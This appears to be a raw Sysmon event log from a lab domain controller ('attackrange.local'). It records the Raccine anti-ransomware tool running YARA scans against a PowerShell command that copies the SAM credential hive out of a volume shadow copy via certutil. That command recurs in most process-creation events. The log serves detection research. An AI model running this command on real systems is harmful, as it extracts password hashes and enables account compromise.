Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164851Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.304{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-6905-010000000E02}7952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+1d80|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002164850Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.300{9DBE88B5-3BBC-61B2-6805-010000000E02}5764ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmpMD5=BFF4FE8007AB527156488C024A63FA25,SHA256=DD2A1CDAC33BC63BBE89155D3C84B03CEB7A12B3F6ECCFDB89FA1736499B436E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002164837Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.946{9DBE88B5-3BBC-61B2-8005-010000000E02}71725576C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164834Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.933{9DBE88B5-3BBC-61B2-8105-010000000E02}56007820C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-8005-010000000E02}7172C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164828Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.921{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-8005-010000000E02}7172C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164827Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.920{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-8005-010000000E02}7172C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164826Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.921{9DBE88B5-3BBC-61B2-8005-010000000E02}7172C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164823Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.905{9DBE88B5-3BBC-61B2-7F05-010000000E02}38524592C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7E05-010000000E02}7516C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164817Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.892{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7E05-010000000E02}7516C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164816Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.892{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7E05-010000000E02}7516C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164815Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.892{9DBE88B5-3BBC-61B2-7E05-010000000E02}7516C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164812Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.876{9DBE88B5-3BBC-61B2-7D05-010000000E02}74884704C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7C05-010000000E02}7664C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164806Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.864{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7C05-010000000E02}7664C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164805Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.864{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7C05-010000000E02}7664C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164804Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.864{9DBE88B5-3BBC-61B2-7C05-010000000E02}7664C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164801Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.848{9DBE88B5-3BBC-61B2-7B05-010000000E02}68402524C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7A05-010000000E02}4892C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164794Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.835{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7A05-010000000E02}4892C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164793Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.835{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7A05-010000000E02}4892C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164792Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.835{9DBE88B5-3BBC-61B2-7A05-010000000E02}4892C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164789Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.818{9DBE88B5-3BBC-61B2-7905-010000000E02}76481364C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7805-010000000E02}7184C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164783Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.807{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7805-010000000E02}7184C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164782Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.806{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7805-010000000E02}7184C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164781Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.806{9DBE88B5-3BBC-61B2-7805-010000000E02}7184C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164778Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.790{9DBE88B5-3BBC-61B2-7705-010000000E02}77406648C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7605-010000000E02}6712C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164772Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.778{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7605-010000000E02}6712C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164771Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.778{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7605-010000000E02}6712C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164770Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.778{9DBE88B5-3BBC-61B2-7605-010000000E02}6712C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164766Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 